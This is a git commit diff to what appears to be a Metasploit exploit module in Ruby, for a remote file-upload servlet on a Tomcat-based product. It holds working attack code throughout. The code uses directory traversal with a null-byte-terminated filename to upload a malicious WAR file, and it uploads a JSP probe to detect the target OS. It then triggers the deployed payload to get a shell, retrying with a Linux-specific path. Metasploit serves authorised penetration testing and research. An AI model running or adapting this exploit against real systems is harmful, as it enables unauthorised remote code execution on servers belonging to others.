Fix Linux target by trying again if exploit fails
parent
2ce00d2239
commit
7483e77bba
|
@ -77,16 +77,64 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
||||||
def exploit
|
def pick_target
|
||||||
app_base = rand_text_alphanumeric(4 + rand(32 - 4))
|
unless target.name == 'Automatic'
|
||||||
tomcat_path = '../../../../'
|
return target
|
||||||
servlet_path = 'rdslogs'
|
end
|
||||||
|
|
||||||
|
print_status("#{peer} - Determining target")
|
||||||
|
os_finder_payload = %Q{<html><body><%out.println(System.getProperty("os.name"));%></body><html>}
|
||||||
|
url = upload_payload(os_finder_payload, false)
|
||||||
|
|
||||||
|
res = send_request_cgi({
|
||||||
|
'uri' => normalize_uri(datastore['TARGETURI'], url),
|
||||||
|
'method' => 'GET',
|
||||||
|
'cookie' => @cookie,
|
||||||
|
'headers' => { 'Referer' => Rex::Text.rand_text_alpha(10 + rand(10)) }
|
||||||
|
})
|
||||||
|
|
||||||
|
if res && res.code == 200
|
||||||
|
if res.body.to_s =~ /Linux/
|
||||||
|
register_files_for_cleanup('webapps/' + url)
|
||||||
|
return targets[1]
|
||||||
|
elsif res.body.to_s =~ /Windows/
|
||||||
|
register_files_for_cleanup('root/' + url)
|
||||||
|
return targets[2]
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
nil
|
||||||
|
end
|
||||||
|
|
||||||
|
|
||||||
|
def send_payload(war_payload, tomcat_path, app_base)
|
||||||
|
# We have to use the Zlib deflate routine as the Metasploit Zip API seems to fail
|
||||||
|
print_status("#{peer} - Uploading WAR file...")
|
||||||
|
res = send_request_cgi({
|
||||||
|
'uri' => normalize_uri(datastore['TARGETURI'], 'rdslogs'),
|
||||||
|
'method' => 'POST',
|
||||||
|
'data' => Zlib::Deflate.deflate(war_payload),
|
||||||
|
'ctype' => 'application/octet-stream',
|
||||||
|
'vars_get' => {
|
||||||
|
'rdsName' => "../../../../#{tomcat_path}#{app_base}.war\x00"
|
||||||
|
}
|
||||||
|
})
|
||||||
|
|
||||||
|
# The server either returns a 200 OK when the upload is successful.
|
||||||
|
if res && res.code == 200
|
||||||
|
print_status("#{peer} - Upload appears to have been successful, waiting #{datastore['SLEEP']} seconds for deployment")
|
||||||
|
else
|
||||||
|
fail_with(Failure::Unknown, "#{peer} - WAR upload failed")
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
|
||||||
|
def exploit
|
||||||
# We need to create the upload directories before our first attempt to upload the WAR.
|
# We need to create the upload directories before our first attempt to upload the WAR.
|
||||||
print_status("#{peer} - Creating upload directory")
|
print_status("#{peer} - Creating upload directory")
|
||||||
bogus_file = rand_text_alphanumeric(4 + rand(32 - 4))
|
bogus_file = rand_text_alphanumeric(4 + rand(32 - 4))
|
||||||
send_request_cgi({
|
send_request_cgi({
|
||||||
'uri' => normalize_uri(datastore['TARGETURI'], servlet_path),
|
'uri' => normalize_uri(datastore['TARGETURI'], 'rdslogs'),
|
||||||
'method' => 'POST',
|
'method' => 'POST',
|
||||||
'data' => Zlib::Deflate.deflate(rand_text_alphanumeric(4 + rand(32 - 4))),
|
'data' => Zlib::Deflate.deflate(rand_text_alphanumeric(4 + rand(32 - 4))),
|
||||||
'ctype' => 'application/xml',
|
'ctype' => 'application/xml',
|
||||||
|
@ -95,27 +143,32 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
}
|
}
|
||||||
})
|
})
|
||||||
|
|
||||||
|
app_base = rand_text_alphanumeric(4 + rand(32 - 4))
|
||||||
war_payload = payload.encoded_war({ :app_name => app_base }).to_s
|
war_payload = payload.encoded_war({ :app_name => app_base }).to_s
|
||||||
|
|
||||||
# We have to use the Zlib deflate routine as the Metasploit Zip API seems to fail
|
send_payload(war_payload, 'tomcat/webapps/', app_base)
|
||||||
print_status("#{peer} - Uploading WAR file...")
|
|
||||||
res = send_request_cgi({
|
|
||||||
'uri' => normalize_uri(datastore['TARGETURI'], servlet_path),
|
|
||||||
'method' => 'POST',
|
|
||||||
'data' => Zlib::Deflate.deflate(war_payload),
|
|
||||||
'ctype' => 'application/octet-stream',
|
|
||||||
'vars_get' => {
|
|
||||||
'rdsName' => "#{tomcat_path}/tomcat/webapps/#{app_base}.war\x00"
|
|
||||||
}
|
|
||||||
})
|
|
||||||
|
|
||||||
# The server either returns a 200 OK when the upload is successful.
|
|
||||||
if res && res.code == 200
|
|
||||||
print_status("#{peer} - Upload appears to have been successful, waiting #{datastore['SLEEP']} seconds for deployment")
|
|
||||||
register_files_for_cleanup("tomcat/webapps/#{app_base}.war")
|
register_files_for_cleanup("tomcat/webapps/#{app_base}.war")
|
||||||
else
|
|
||||||
fail_with(Failure::Unknown, "#{peer} - WAR upload failed")
|
10.times do
|
||||||
|
select(nil, nil, nil, 2)
|
||||||
|
|
||||||
|
# Now make a request to trigger the newly deployed war
|
||||||
|
print_status("#{peer} - Attempting to launch payload in deployed WAR...")
|
||||||
|
res = send_request_cgi({
|
||||||
|
'uri' => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8)),
|
||||||
|
'method' => 'GET'
|
||||||
|
})
|
||||||
|
# Failure. The request timed out or the server went away.
|
||||||
|
break if res.nil?
|
||||||
|
# Success! Triggered the payload, should have a shell incoming
|
||||||
|
break if res.code == 200
|
||||||
end
|
end
|
||||||
|
print_error("#{peer} - Failed to launch payload. Trying one last time with a different path...")
|
||||||
|
|
||||||
|
# OK this might be a Linux server, it's a different traversal path.
|
||||||
|
# Let's try again...
|
||||||
|
send_payload(war_payload, '', app_base)
|
||||||
|
register_files_for_cleanup("webapps/#{app_base}.war")
|
||||||
|
|
||||||
10.times do
|
10.times do
|
||||||
select(nil, nil, nil, 2)
|
select(nil, nil, nil, 2)
|
||||||
|
|
Loading…
Reference in New Issue